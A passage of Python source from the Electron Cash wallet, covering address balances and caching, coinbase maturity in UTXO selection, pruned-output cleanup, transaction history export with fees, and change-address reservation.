return out
# return the total amount ever received by an address
def get_addr_received(self, address):
received, sent = self.get_addr_io(address)
return sum([v for height, v, is_cb in received.values()])
def get_addr_balance(self, address, exclude_frozen_coins=False):
''' Returns the balance of a bitcoin address as a tuple of:
(confirmed_matured, unconfirmed, unmatured)
Note that 'exclude_frozen_coins = True' only checks for coin-level
freezing, not address-level. '''
assert isinstance(address, Address)
mempoolHeight = self.get_local_height() + 1
if not exclude_frozen_coins: # we do not use the cache when excluding frozen coins as frozen status is a dynamic quantity that can change at any time in the UI
cached = self._addr_bal_cache.get(address)
if cached is not None:
return cached
received, sent = self.get_addr_io(address)
c = u = x = 0
had_cb = False
for txo, (tx_height, v, is_cb) in received.items():
if exclude_frozen_coins and (txo in self.frozen_coins or txo in self.frozen_coins_tmp):
continue
had_cb = had_cb or is_cb # remember if this address has ever seen a coinbase txo
if is_cb and tx_height + bitcoin.COINBASE_MATURITY > mempoolHeight:
x += v
elif tx_height > 0:
c += v
else:
u += v
if txo in sent:
if sent[txo] > 0:
c -= v
else:
u -= v
result = c, u, x
if not exclude_frozen_coins and not had_cb:
# Cache the results.
# Cache needs to be invalidated if a transaction is added to/
# removed from addr history. (See self._addr_bal_cache calls
# related to this littered throughout this file).
#
# Note that as a performance tweak we don't ever cache balances for
# addresses involving coinbase coins. The rationale being as
# follows: Caching of balances of the coinbase addresses involves
# a dynamic quantity: maturity of the coin (which considers the
# ever-changing block height).
#
# There wasn't a good place in this codebase to signal the maturity
# happening (and thus invalidate the cache entry for the exact
# address that holds the coinbase coin in question when a new
# block is found that matures a coinbase coin).
#
# In light of that fact, a possible approach would be to invalidate
# this entire cache when a new block arrives (this is what Electrum
# does). However, for Electron Cash with its focus on many addresses
# for future privacy features such as integrated CashShuffle --
# being notified in the wallet and invalidating the *entire* cache
# whenever a new block arrives (which is the exact time you do
# the most GUI refreshing and calling of this function) seems a bit
# heavy-handed, just for sake of the (relatively rare, for the
# average user) coinbase-carrying addresses.
#
# It's not a huge performance hit for the coinbase addresses to
# simply not cache their results, and have this function recompute
# their balance on each call, when you consider that as a
# consequence of this policy, all the other addresses that are
# non-coinbase can benefit from a cache that stays valid for longer
# than 1 block (so long as their balances haven't changed).
self._addr_bal_cache[address] = result
return result
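# Worked example with hypothetical numbers: an address holding a 5000 sat
# coinbase that has not yet matured, a 2000 sat confirmed receipt, and a
# 1000 sat unconfirmed receipt (nothing spent) returns
# (confirmed, unconfirmed, unmatured) == (2000, 1000, 5000).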
def get_spendable_coins(self, domain, config, isInvoice = False):
confirmed_only = config.get('confirmed_only', DEFAULT_CONFIRMED_ONLY)
if (isInvoice):
confirmed_only = True
return self.get_utxos(domain, exclude_frozen=True, mature=True, confirmed_only=confirmed_only, exclude_slp=True)
def get_utxos(self, domain = None, exclude_frozen = False, mature = False, confirmed_only = False,
*, addr_set_out = None, exclude_slp = True):
'''Note that exclude_frozen = True checks for BOTH address-level and
coin-level frozen status.
exclude_slp skips coins that also have SLP tokens on them. This defaults
to True in EC 4.0.10+ in order to prevent inadvertently burning tokens.
Optional kw-only arg `addr_set_out` specifies a set in which to add all
addresses encountered in the utxos returned. '''
with self.lock:
mempoolHeight = self.get_local_height() + 1
coins = []
if domain is None:
domain = self.get_addresses()
if exclude_frozen:
domain = set(domain) - self.frozen_addresses
for addr in domain:
utxos = self.get_addr_utxo(addr)
len_before = len(coins)
for x in utxos.values():
if exclude_slp and x['slp_token']:
continue
if exclude_frozen and x['is_frozen_coin']:
continue
if confirmed_only and x['height'] <= 0:
continue
# A note about maturity: Previous versions of Electrum
# and Electron Cash were off by one. Maturity is
# calculated based off mempool height (chain tip height + 1).
# See bitcoind consensus/tx_verify.cpp Consensus::CheckTxInputs
# and also txmempool.cpp CTxMemPool::removeForReorg.
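# Worked example (assuming bitcoin.COINBASE_MATURITY == 100): a coinbase
# mined at height 100 stays immature while mempoolHeight - 100 < 100,
# i.e. it first becomes spendable once the chain tip reaches height 199
# (mempoolHeight == 200).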
if mature and x['coinbase'] and mempoolHeight - x['height'] < bitcoin.COINBASE_MATURITY:
continue
coins.append(x)
if addr_set_out is not None and len(coins) > len_before:
# add this address to the address set if it has results
addr_set_out.add(addr)
return coins
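# A minimal usage sketch (assumes a synced wallet instance named `wallet`):
#
#   touched_addrs = set()
#   coins = wallet.get_utxos(exclude_frozen=True, mature=True,
#                            confirmed_only=False, addr_set_out=touched_addrs)
#   # `coins` is a list of coin dicts as built by get_addr_utxo() above;
#   # `touched_addrs` now contains every Address that contributed a coin.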
def dummy_address(self):
return self.get_receiving_addresses()[0]
def get_addresses(self):
return self.get_receiving_addresses() + self.get_change_addresses()
def get_change_addresses(self):
''' Reimplemented in subclasses for wallets that have a change address set/derivation path. '''
return []
def get_frozen_balance(self):
if not self.frozen_coins and not self.frozen_coins_tmp:
# performance short-cut -- get the balance of the frozen address set only IFF we don't have any frozen coins
return self.get_balance(self.frozen_addresses)
# otherwise, do this more costly calculation...
cc_no_f, uu_no_f, xx_no_f = self.get_balance(None, exclude_frozen_coins = True, exclude_frozen_addresses = True)
cc_all, uu_all, xx_all = self.get_balance(None, exclude_frozen_coins = False, exclude_frozen_addresses = False)
return (cc_all-cc_no_f), (uu_all-uu_no_f), (xx_all-xx_no_f)
def get_balance(self, domain=None, exclude_frozen_coins=False, exclude_frozen_addresses=False):
if domain is None:
domain = self.get_addresses()
if exclude_frozen_addresses:
domain = set(domain) - self.frozen_addresses
cc = uu = xx = 0
for addr in domain:
c, u, x = self.get_addr_balance(addr, exclude_frozen_coins)
cc += c
uu += u
xx += x
return cc, uu, xx
def get_address_history(self, address):
assert isinstance(address, Address)
return self._history.get(address, [])
def _clean_pruned_txo_thread(self):
''' Runs in the thread self.pruned_txo_cleaner_thread which is only
active if self.network. Cleans the self.pruned_txo dict and the
self.pruned_txo_values set of spends that are not relevant to the
wallet. The processing below is needed because as of 9/16/2019, Electron
Cash temporarily puts all spends that pass through add_transaction and
have an unparseable address (txi['address'] is None) into the dict
self.pruned_txo. This is necessary for handling tx's with esoteric p2sh
scriptSigs and detecting balance changes properly for txins
containing such scriptSigs. See #895. '''
def deser(ser):
prevout_hash, prevout_n = ser.split(':')
prevout_n = int(prevout_n)
return prevout_hash, prevout_n
def mkser(prevout_hash, prevout_n):
return f'{prevout_hash}:{prevout_n}'
def rm(ser, pruned_too=True, *, tup = None):
h, n = tup or deser(ser) # tup arg is for performance when caller already knows the info (avoid a redundant .split on ':')
s = txid_n[h]
s.discard(n)
if not s:
txid_n.pop(h, None)
if pruned_too:
with self.lock:
tx_hash = self.pruned_txo.pop(ser, None)
self.pruned_txo_values.discard(tx_hash)
def add(ser):
prevout_hash, prevout_n = deser(ser)
txid_n[prevout_hash].add(prevout_n)
def keep_running():
return bool(self.network and self.pruned_txo_cleaner_thread is me)
def can_do_work():
return bool(txid_n and self.is_up_to_date())
debug = False # set this to true here to get more verbose output
me = threading.current_thread()
q = me.q
me.txid_n = txid_n = defaultdict(set) # dict of prevout_hash -> set of prevout_n (int)
last = time.time()
try:
self.print_error(f"{me.name}: thread started")
with self.lock:
# Setup -- grab whatever was already in pruned_txo at thread
# start
for ser in self.pruned_txo:
h, n = deser(ser)
txid_n[h].add(n)
while keep_running():
try:
ser = q.get(timeout=5.0 if can_do_work() else 20.0)
if ser is None:
# quit thread
return
if ser.startswith('r_'):
# remove requested
rm(ser[2:], False)
else:
# ser was added
add(ser)
del ser
except queue.Empty:
pass
if not can_do_work():
continue
t0 = time.time()
if t0 - last < 1.0: # run no more often than once per second
continue
last = t0
defunct_ct = 0
for prevout_hash, s in txid_n.copy().items():
for prevout_n in s.copy():
ser = mkser(prevout_hash, prevout_n)
with self.lock:
defunct = ser not in self.pruned_txo
if defunct:
#self.print_error(f"{me.name}: skipping already-cleaned", ser)
rm(ser, False, tup=(prevout_hash, prevout_n))
defunct_ct += 1
continue
if defunct_ct and debug:
self.print_error(f"{me.name}: DEBUG", defunct_ct, "defunct txos removed in", time.time()-t0, "secs")
ct = 0
for prevout_hash, s in txid_n.copy().items():
try:
with self.lock:
tx = self.transactions.get(prevout_hash)
if tx is None:
tx = Transaction.tx_cache_get(prevout_hash)
if isinstance(tx, Transaction):
tx = Transaction(tx.raw) # take a copy
else:
if debug: self.print_error(f"{me.name}: DEBUG retrieving txid", prevout_hash, "...")
t1 = time.time()
tx = Transaction(self.network.synchronous_get(('blockchain.transaction.get', [prevout_hash])))
if debug: self.print_error(f"{me.name}: DEBUG network retrieve took", time.time()-t1, "secs")
# Paranoia; intended side effect of the below assert
# is to also deserialize the tx (by calling the slow
# .txid()) which ensures the tx from the server
# is not junk.
assert prevout_hash == tx.txid(), "txid mismatch"
Transaction.tx_cache_put(tx, prevout_hash) # will cache a copy
except Exception as e:
self.print_error(f"{me.name}: Error retrieving txid", prevout_hash, ":", repr(e))
if not keep_running(): # in case we got a network timeout *and* the wallet was closed
return
continue
if not keep_running():
return
for prevout_n in s.copy():
ser = mkser(prevout_hash, prevout_n)
try:
txo = tx.outputs()[prevout_n]
except IndexError:
self.print_error(f"{me.name}: ERROR -- could not find output", ser)
rm(ser, True, tup=(prevout_hash, prevout_n))
continue
_typ, addr, v = txo
rm_pruned_too = False
with self.lock:
mine = self.is_mine(addr)
if not mine and ser in self.pruned_txo:
ct += 1
rm_pruned_too = True
rm(ser, rm_pruned_too, tup=(prevout_hash, prevout_n))
if rm_pruned_too and debug:
self.print_error(f"{me.name}: DEBUG removed", ser)
if ct:
with self.lock:
# Save changes to storage -- this is cheap and doesn't
# actually write to file yet, just flags storage as
# 'dirty' for when wallet.storage.write() is called
# later.
self.storage.put('pruned_txo', self.pruned_txo)
self.print_error(f"{me.name}: removed", ct,
"(non-relevant) pruned_txo's in",
f'{time.time()-t0:3.2f}', "seconds")
except:
import traceback
self.print_error(f"{me.name}:", traceback.format_exc())
raise
finally:
self.print_error(f"{me.name}: thread exiting")
def add_transaction(self, tx_hash, tx):
if not tx.inputs():
# bad tx came in off the wire -- all 0's or something, see #987
self.print_error("add_transaction: WARNING a tx came in from the network with 0 inputs!"
" Bad server? Ignoring tx:", tx_hash)
return
is_coinbase = tx.inputs()[0]['type'] == 'coinbase'
with self.lock:
# HELPER FUNCTIONS
def add_to_self_txi(tx_hash, addr, ser, v):
''' addr must be 'is_mine' '''
d = self.txi.get(tx_hash)
if d is None:
self.txi[tx_hash] = d = {}
l = d.get(addr)
if l is None:
d[addr] = l = []
l.append((ser, v))
def find_in_self_txo(prevout_hash: str, prevout_n: int) -> tuple:
"""Returns a tuple of the (Address,value) for a given
prevout_hash:prevout_n, or (None, None) if not found. If valid
return, the Address object is found by scanning self.txo. The
lookup below is relatively fast in practice even on pathological
wallets."""
dd = self.txo.get(prevout_hash, {})
for addr2, item in dd.items():
for n, v, is_cb in item:
if n == prevout_n:
return addr2, v
return (None, None)
def txin_get_info(txi):
prevout_hash = txi['prevout_hash']
prevout_n = txi['prevout_n']
ser = f'{prevout_hash}:{prevout_n}'
return prevout_hash, prevout_n, ser
def put_pruned_txo(ser, tx_hash):
self.pruned_txo[ser] = tx_hash
self.pruned_txo_values.add(tx_hash)
t = self.pruned_txo_cleaner_thread
if t and t.q: t.q.put(ser)
def pop_pruned_txo(ser):
next_tx = self.pruned_txo.pop(ser, None)
if next_tx:
self.pruned_txo_values.discard(next_tx)
t = self.pruned_txo_cleaner_thread
if t and t.q: t.q.put('r_' + ser) # notify of removal
return next_tx
# /HELPER FUNCTIONS
# add inputs
self.txi[tx_hash] = d = {}
for txi in tx.inputs():
if txi['type'] == 'coinbase':
continue
addr = txi.get('address')
# find value from prev output
if self.is_mine(addr):
prevout_hash, prevout_n, ser = txin_get_info(txi)
dd = self.txo.get(prevout_hash, {})
for n, v, is_cb in dd.get(addr, []):
if n == prevout_n:
add_to_self_txi(tx_hash, addr, ser, v)
break
else:
# Coin's spend tx came in before its receive tx: flag
# the spend for when the receive tx will arrive into
# this function later.
put_pruned_txo(ser, tx_hash)
self._addr_bal_cache.pop(addr, None) # invalidate cache entry
del dd, prevout_hash, prevout_n, ser
elif addr is None:
# Unknown/unparsed address.. may be a strange p2sh scriptSig
# Try and find it in txout's if it's one of ours.
# See issue #895.
prevout_hash, prevout_n, ser = txin_get_info(txi)
# Find address in self.txo for this prevout_hash:prevout_n
addr2, v = find_in_self_txo(prevout_hash, prevout_n)
if addr2 is not None and self.is_mine(addr2):
add_to_self_txi(tx_hash, addr2, ser, v)
self._addr_bal_cache.pop(addr2, None) # invalidate cache entry
else:
# Not found in self.txo. It may still be one of ours
# however since tx's can come in out of order due to
# CTOR, etc, and self.txo may not have it yet. So we
# flag the spend now, and when the out-of-order prevout
# tx comes in later for this input (if it's indeed one
# of ours), the real address for this input will get
# picked up then in the "add outputs" section below in
# this function. At that point, self.txi will be
# properly updated to indicate the coin in question was
# spent via an add_to_self_txi call.
#
# If it's *not* one of ours, however, the below will
# grow pruned_txo with an irrelevant entry. However, the
# irrelevant entry will eventually be reaped and removed
# by the self.pruned_txo_cleaner_thread which runs
# periodically in the background.
put_pruned_txo(ser, tx_hash)
del addr2, v, prevout_hash, prevout_n, ser
# don't keep empty entries in self.txi
if not d:
self.txi.pop(tx_hash, None)
# add outputs
self.txo[tx_hash] = d = {}
op_return_ct = 0
deferred_cashacct_add = None
for n, txo in enumerate(tx.outputs()):
ser = tx_hash + ':%d'%n
_type, addr, v = txo
mine = False
if isinstance(addr, ScriptOutput):
if addr.is_opreturn():
op_return_ct += 1
if isinstance(addr, cashacct.ScriptOutput):
# auto-detect CashAccount registrations we see,
# and notify cashacct subsystem of that fact. But we
# can only do it after making sure it's the *only*
# OP_RETURN in the tx.
deferred_cashacct_add = (
lambda _tx_hash=tx_hash, _tx=tx, _addr=addr:
self.cashacct.add_transaction_hook(_tx_hash, _tx, _addr)
)
elif self.is_mine(addr):
# add coin to self.txo since it's mine.
mine = True
l = d.get(addr)
if l is None:
d[addr] = l = []
l.append((n, v, is_coinbase))
del l
self._addr_bal_cache.pop(addr, None) # invalidate cache entry
# give v to txi that spends me
next_tx = pop_pruned_txo(ser)
if next_tx is not None and mine:
add_to_self_txi(next_tx, addr, ser, v)
# don't keep empty entries in self.txo
if not d:
self.txo.pop(tx_hash, None)
# save
self.transactions[tx_hash] = tx
# Invoke the cashacct add hook (if defined) here at the end, with
# the lock held. We accept the cashacct.ScriptOutput only iff
# op_return_ct == 1 as per the Cash Accounts spec.
# See: https://gitlab.com/cash-accounts/lookup-server/blob/master/routes/parser.js#L253
if op_return_ct == 1 and deferred_cashacct_add:
deferred_cashacct_add()
# Unconditionally invoke the SLP handler. Note that it is a fast &
# cheap no-op if this tx's outputs[0] is not an SLP script.
self.slp.add_tx(tx_hash, tx)
def remove_transaction(self, tx_hash):
with self.lock:
self.print_error("removing tx from history", tx_hash)
# Note that we don't actually remove the tx_hash from
# self.transactions, but instead rely on the unreferenced tx being
# removed the next time the wallet is loaded in self.load_transactions()
for ser, hh in list(self.pruned_txo.items()):
if hh == tx_hash:
self.pruned_txo.pop(ser)
self.pruned_txo_values.discard(hh)
# add tx to pruned_txo, and undo the txi addition
for next_tx, dd in self.txi.items():
for addr, l in list(dd.items()):
ll = l[:]
for item in ll:
ser, v = item
prev_hash, prev_n = ser.split(':')
if prev_hash == tx_hash:
self._addr_bal_cache.pop(addr, None) # invalidate cache entry
l.remove(item)
self.pruned_txo[ser] = next_tx
self.pruned_txo_values.add(next_tx)
if l == []:
dd.pop(addr)
else:
dd[addr] = l
# invalidate addr_bal_cache for outputs involving this tx
d = self.txo.get(tx_hash, {})
for addr in d:
self._addr_bal_cache.pop(addr, None) # invalidate cache entry
try: self.txi.pop(tx_hash)
except KeyError: self.print_error("tx was not in input history", tx_hash)
try: self.txo.pop(tx_hash)
except KeyError: self.print_error("tx was not in output history", tx_hash)
# do this with the lock held
self.cashacct.remove_transaction_hook(tx_hash)
# inform slp subsystem as well
self.slp.rm_tx(tx_hash)
def receive_tx_callback(self, tx_hash, tx, tx_height):
self.add_transaction(tx_hash, tx)
self.add_unverified_tx(tx_hash, tx_height)
if self.network and self.network.callback_listener_count("payment_received") > 0:
for _a, addr, _b in tx.outputs():
status = self.get_request_status(addr) # returns PR_UNKNOWN quickly if addr has no requests, otherwise returns tuple
if status != PR_UNKNOWN:
status = status[0] # unpack status from tuple
self.network.trigger_callback('payment_received', self, addr, status)
def receive_history_callback(self, addr, hist, tx_fees):
with self.lock:
old_hist = self.get_address_history(addr)
for tx_hash, height in old_hist:
if (tx_hash, height) not in hist:
s = self.tx_addr_hist.get(tx_hash)
if s:
s.discard(addr)
if not s:
# if no address references this tx anymore, kill it
# from txi/txo dicts.
if s is not None:
# We won't keep empty sets around.
self.tx_addr_hist.pop(tx_hash)
# note this call doesn't actually remove the tx from
# storage, it merely removes it from the self.txi
# and self.txo dicts
self.remove_transaction(tx_hash)
self._addr_bal_cache.pop(addr, None) # unconditionally invalidate cache entry
self._history[addr] = hist
for tx_hash, tx_height in hist:
# add it in case it was previously unconfirmed
self.add_unverified_tx(tx_hash, tx_height)
# add reference in tx_addr_hist
self.tx_addr_hist[tx_hash].add(addr)
# if addr is new, we have to recompute txi and txo
tx = self.transactions.get(tx_hash)
if tx is not None and self.txi.get(tx_hash, {}).get(addr) is None and self.txo.get(tx_hash, {}).get(addr) is None:
self.add_transaction(tx_hash, tx)
# Store fees
self.tx_fees.update(tx_fees)
if self.network:
self.network.trigger_callback('on_history', self)
def add_tx_to_history(self, txid):
with self.lock:
for addr in itertools.chain(list(self.txi.get(txid, {}).keys()), list(self.txo.get(txid, {}).keys())):
cur_hist = self._history.get(addr, list())
if not any(True for x in cur_hist if x[0] == txid):
cur_hist.append((txid, 0))
self._history[addr] = cur_hist
def get_history(self, domain=None, *, reverse=False):
# get domain
if domain is None:
domain = self.get_addresses()
# 1. Get the history of each address in the domain, maintain the
# delta of a tx as the sum of its deltas on domain addresses
tx_deltas = defaultdict(int)
for addr in domain:
h = self.get_address_history(addr)
for tx_hash, height in h:
delta = self.get_tx_delta(tx_hash, addr)
if delta is None or tx_deltas[tx_hash] is None:
tx_deltas[tx_hash] = None
else:
tx_deltas[tx_hash] += delta
# 2. create sorted history
history = []
for tx_hash in tx_deltas:
delta = tx_deltas[tx_hash]
height, conf, timestamp = self.get_tx_height(tx_hash)
history.append((tx_hash, height, conf, timestamp, delta))
history.sort(key = lambda x: self.get_txpos(x[0]), reverse=True)
# 3. add balance
c, u, x = self.get_balance(domain)
balance = c + u + x
h2 = []
for tx_hash, height, conf, timestamp, delta in history:
h2.append((tx_hash, height, conf, timestamp, delta, balance))
if balance is None or delta is None:
balance = None
else:
balance -= delta
if not reverse:
h2.reverse()
return h2
def export_history(self, domain=None, from_timestamp=None, to_timestamp=None, fx=None,
show_addresses=False, decimal_point=8,
*, fee_calc_timeout=10.0, download_inputs=False,
progress_callback=None):
''' Export history. Used by RPC & GUI.
Arg notes:
- `fee_calc_timeout` is used when computing the fee (which is done
asynchronously in another thread) to limit the total amount of time in
seconds spent waiting for fee calculation. The timeout is a total time
allotment for this function call. (The reason the fee calc can take a
long time is for some pathological tx's, it is very slow to calculate
fee as it involves deserializing prevout_tx from the wallet, for each
input).
- `download_inputs`, if True, will allow for more accurate fee data to
be exported with the history by using the Transaction class input
fetcher to download *all* prevout_hash tx's for inputs (even for
inputs not in wallet). This feature requires self.network (ie, we need
to be online) otherwise it will behave as if download_inputs=False.
- `progress_callback`, if specified, is a callback which receives a
single float argument in the range [0.0,1.0] indicating how far along
the history export is going. This is intended for interop with GUI
code. Note that the progress callback is not guaranteed to be called in the
context of the main thread, therefore GUI code should use appropriate
signals/slots to update the GUI with progress info.
Note on side effects: This function may update self.tx_fees. Rationale:
it will spend some time trying very hard to calculate accurate fees by
examining prevout_tx's (leveraging the fetch_input_data code in the
Transaction class). As such, it is worthwhile to cache the results in
self.tx_fees, which gets saved to wallet storage. This is not very
demanding on storage as even for very large wallets with huge histories,
tx_fees does not use more than a few hundred kb of space. '''
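# A minimal usage sketch; `wallet` is an instance of this class and the
# keyword values are illustrative only:
#
#   rows = wallet.export_history(fee_calc_timeout=5.0, download_inputs=False,
#                                progress_callback=lambda frac: print(f"{frac:.0%}"))
#   for row in rows:
#       print(row['txid'], row['date'], row['value'], row['balance'])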
from .util import timestamp_to_datetime
# we save copies of tx's we deserialize to this temp dict because we do
# *not* want to deserialize tx's in wallet.transactions since that
# wastes memory
local_tx_cache = {}
# some helpers for this function
t0 = time.time()
def time_remaining(): return max(fee_calc_timeout - (time.time()-t0), 0)
class MissingTx(RuntimeError):
''' Can happen in rare circumstances if wallet history is being
radically reorged by network thread while we are in this code. '''
def get_tx(tx_hash):
''' Try to get a tx from wallet, then from the Transaction class
cache if that fails. In either case it deserializes the copy and
puts the deserialized tx in local stack dict local_tx_cache. The
reason we don't deserialize the tx's from self.transactions is that
we do not want to keep deserialized tx's in memory. The
self.transactions dict should contain just raw tx's (not
deserialized). Deserialized tx's eat on the order of 10x the memory
because of the Python lists, dicts, etc. they contain, per
instance. '''
tx = local_tx_cache.get(tx_hash)
if tx:
return tx
tx = Transaction.tx_cache_get(tx_hash)
if not tx:
tx = copy.deepcopy(self.transactions.get(tx_hash))
if tx:
tx.deserialize()
local_tx_cache[tx_hash] = tx
else:
raise MissingTx(f'txid {tx_hash} dropped out of wallet history while exporting')
return tx
def try_calc_fee(tx_hash):
''' Try to calc fee from cheapest to most expensive calculation.
Ultimately asks the transaction class to look at prevouts in wallet and uses
that scheme as a last (more CPU intensive) resort. '''
fee = self.tx_fees.get(tx_hash)
if fee is not None:
return fee
def do_get_fee(tx_hash):
tx = get_tx(tx_hash)
def try_get_fee(tx):
try: return tx.get_fee()
except InputValueMissing: pass
fee = try_get_fee(tx)
t_remain = time_remaining()
if fee is None and t_remain:
q = queue.Queue()
def done():
q.put(1)
tx.fetch_input_data(self, use_network=bool(download_inputs), done_callback=done)
try: q.get(timeout=t_remain)
except queue.Empty: pass
fee = try_get_fee(tx)
return fee
fee = do_get_fee(tx_hash)
if fee is not None:
self.tx_fees[tx_hash] = fee # save fee to wallet if we bothered to dl/calculate it.
return fee
def fmt_amt(v, is_diff):
if v is None:
return '--'
return format_satoshis(v, decimal_point=decimal_point,
is_diff=is_diff)
# grab history
h = self.get_history(domain, reverse=True)
out = []
n, l = 0, max(1, float(len(h)))
for tx_hash, height, conf, timestamp, value, balance in h:
if progress_callback:
progress_callback(n/l)
n += 1
timestamp_safe = timestamp
if timestamp is None:
timestamp_safe = time.time() # set it to "now" so below code doesn't explode.
if from_timestamp and timestamp_safe < from_timestamp:
continue
if to_timestamp and timestamp_safe >= to_timestamp:
continue
try:
fee = try_calc_fee(tx_hash)
except MissingTx as e:
self.print_error(str(e))
continue
item = {
'txid' : tx_hash,
'height' : height,
'confirmations' : conf,
'timestamp' : timestamp_safe,
'value' : fmt_amt(value, is_diff=True),
'fee' : fmt_amt(fee, is_diff=False),
'balance' : fmt_amt(balance, is_diff=False),
}
if item['height'] > 0:
date_str = format_time(timestamp) if timestamp is not None else _("unverified")
else:
date_str = _("unconfirmed")
item['date'] = date_str
try:
# Defensive programming.. sanitize label.
# The below ensures strings are utf8-encodable. We do this
# as a paranoia measure.
item['label'] = self.get_label(tx_hash).encode(encoding='utf-8', errors='replace').decode(encoding='utf-8', errors='replace')
except UnicodeError:
self.print_error(f"Warning: could not export label for {tx_hash}, defaulting to ???")
item['label'] = "???"
if show_addresses:
tx = get_tx(tx_hash)
input_addresses = []
output_addresses = []
for x in tx.inputs():
if x['type'] == 'coinbase': continue
addr = x.get('address')
if addr is None: continue
input_addresses.append(addr.to_full_ui_string())
for _type, addr, v in tx.outputs():
output_addresses.append(addr.to_full_ui_string())
item['input_addresses'] = input_addresses
item['output_addresses'] = output_addresses
if fx is not None:
date = timestamp_to_datetime(timestamp_safe)
item['fiat_value'] = fx.historical_value_str(value, date)
item['fiat_balance'] = fx.historical_value_str(balance, date)
item['fiat_fee'] = fx.historical_value_str(fee, date)
out.append(item)
if progress_callback:
progress_callback(1.0) # indicate done, just in case client code expects a 1.0 in order to detect completion
return out
def get_label(self, tx_hash):
label = self.labels.get(tx_hash, '')
if not label:
label = self.get_default_label(tx_hash)
return label
def get_default_label(self, tx_hash):
if not self.txi.get(tx_hash):
d = self.txo.get(tx_hash, {})
labels = []
for addr in list(d.keys()): # use a copy to avoid possibility of dict changing during iteration, see #1328
label = self.labels.get(addr.to_storage_string())
if label:
labels.append(label)
return ', '.join(labels)
return ''
def get_tx_status(self, tx_hash, height, conf, timestamp):
"""Return a status value and status string.
Meaning of the status flag:
- 0: unconfirmed parent
- 1: status no longer used (it used to mean low fee for BTC)
- 2: unconfirmed
- 3: not verified (included in latest block)
- 4: verified by 1 block
- 5: verified by 2 blocks
- 6: verified by 3 blocks
- 7: verified by 4 blocks
- 8: verified by 5 blocks
- 9: verified by 6 blocks or more
"""
if conf == 0:
tx = self.transactions.get(tx_hash)
if not tx:
status = 3
status_str = 'unknown'
elif height < 0:
status = 0
status_str = 'Unconfirmed parent'
elif height == 0:
status = 2
status_str = 'Unconfirmed'
else:
status = 3
status_str = 'Not Verified'
else:
status = 3 + min(conf, 6)
status_str = format_time(timestamp) if timestamp else _("unknown")
return status, status_str
def reserve_change_addresses(self, count, temporary=False):
""" Reserve and return `count` change addresses. In order
of preference, this will return from:
1. addresses 'freed' by `.unreserve_change_address`,
2. addresses in the last 20 (gap limit) of the change list,
3. newly-created addresses.
Of these, only unlabeled, unreserved addresses with no usage history
will be returned. If you pass temporary=False (default), this will
persist upon wallet saving, otherwise with temporary=True the address
will be made available again once the wallet is re-opened.
On non-deterministic wallets, this returns an empty list.
"""
if count <= 0 or not hasattr(self, 'create_new_address'):
return []
with self.lock:
last_change_addrs = self.get_change_addresses()[-self.gap_limit_for_change:]
if not last_change_addrs:
# this happens in non-deterministic wallets but the above
# hasattr check should have caught those.
return []
def gen_change():
try:
while True:
yield self.change_unreserved.pop(0)
except IndexError:
pass
for addr in last_change_addrs:
yield addr
while True:
yield self.create_new_address(for_change=True)
result = []
for addr in gen_change():
if ( addr in self.change_reserved
or addr in self.change_reserved_tmp
or self.get_num_tx(addr) != 0
or addr in result):
continue
addr_str = addr.to_storage_string()
if self.labels.get(addr_str):
continue
result.append(addr)
if temporary:
self.change_reserved_tmp.add(addr)
else:
self.change_reserved.add(addr)
if len(result) >= count:
return result
raise RuntimeError("Unable to generate new addresses") # should not happen
def unreserve_change_address(self, addr):
""" Unreserve an addr that was set by reserve_change_addresses, and
also explicitly reschedule this address to be usable by a future
reservation. Unreserving is appropriate when the address was never
actually shared or used in a transaction, and reduces empty gaps in
the change list.
"""
assert addr in self.get_change_addresses()
with self.lock:
self.change_reserved.discard(addr)
self.change_reserved_tmp.discard(addr)
self.change_unreserved.append(addr)
def get_default_change_addresses(self, count):
""" Return `count` change addresses from the default reserved list,
ignoring and removing used addresses. Reserves more as needed.
The same default change addresses keep getting repeated until they are
actually seen as used in a transaction from the network. Theoretically
this could hurt privacy if the user has multiple unsigned transactions
open at the same time, but practically this avoids address gaps for
normal usage. If you need non-repeated addresses, see
`reserve_change_addresses`.
On non-deterministic wallets, this returns an empty list.
"""
result = []
with self.lock:
for addr in list(self.change_reserved_default):
if len(result) >= count:
break
if self.get_num_tx(addr) != 0:
self.change_reserved_default.remove(addr)
continue
result.append(addr)
need_more = count - len(result)
if need_more > 0:
new_addrs = self.reserve_change_addresses(need_more)
self.change_reserved_default.extend(new_addrs)
result.extend(new_addrs)
return result
def make_unsigned_transaction(self, inputs, outputs, config, fixed_fee=None, change_addr=None, sign_schnorr=None):
''' sign_schnorr flag controls whether to mark the tx as signing with
schnorr or not. Specify either a bool, or set the flag to 'None' to use
whatever the wallet is configured to use from the GUI '''
sign_schnorr = self.is_schnorr_enabled() if sign_schnorr is None else bool(sign_schnorr)
# check outputs
i_max = None
for i, o in enumerate(outputs):
_type, data, value = o
if value == '!':
if i_max is not None:
raise BaseException("More than one output set to spend max")
i_max = i
# Avoid index-out-of-range with inputs[0] below
if not inputs:
raise NotEnoughFunds()
if fixed_fee is None and config.fee_per_kb() is None:
raise BaseException('Dynamic fee estimates not available')
for item in inputs:
self.add_input_info(item)
# Fee estimator
if fixed_fee is None:
fee_estimator = config.estimate_fee
elif callable(fixed_fee):
fee_estimator = fixed_fee
else:
fee_estimator = lambda size: fixed_fee
if i_max is None:
# Let the coin chooser select the coins to spend
change_addrs = []
if change_addr:
change_addrs = [change_addr]
if not change_addrs:
# hook gave us nothing, so find a change addr from the change
# reservation subsystem
max_change = self.max_change_outputs if self.multiple_change else 1
if self.use_change:
change_addrs = self.get_default_change_addresses(max_change)
else:
change_addrs = []
if not change_addrs:
# For some reason we couldn't get any autogenerated change
# address (non-deterministic wallet?). So, try to find an
# input address that belongs to us.
for inp in inputs:
backup_addr = inp['address']
if self.is_mine(backup_addr):
change_addrs = [backup_addr]
break
else:
# ok, none of the inputs are "mine" (why?!) -- fall back
# to picking first max_change change_addresses that have
# no history
change_addrs = []
for addr in self.get_change_addresses()[-self.gap_limit_for_change:]:
if self.get_num_tx(addr) == 0:
change_addrs.append(addr)
if len(change_addrs) >= max_change:
break
if not change_addrs:
# No unused wallet addresses or no change addresses.
# Fall back to picking ANY wallet address
try:
# Pick a random address
change_addrs = [random.choice(self.get_addresses())]
except IndexError:
change_addrs = [] # Address-free wallet?!
# This should never happen
if not change_addrs:
raise RuntimeError("Can't find a change address!")
assert all(isinstance(addr, Address) for addr in change_addrs)
coin_chooser = coinchooser.CoinChooserPrivacy()
tx = coin_chooser.make_tx(inputs, outputs, change_addrs,
fee_estimator, DUST_THRESHOLD, sign_schnorr=sign_schnorr)
else:
sendable = sum(map(lambda x:x['value'], inputs))
_type, data, value = outputs[i_max]
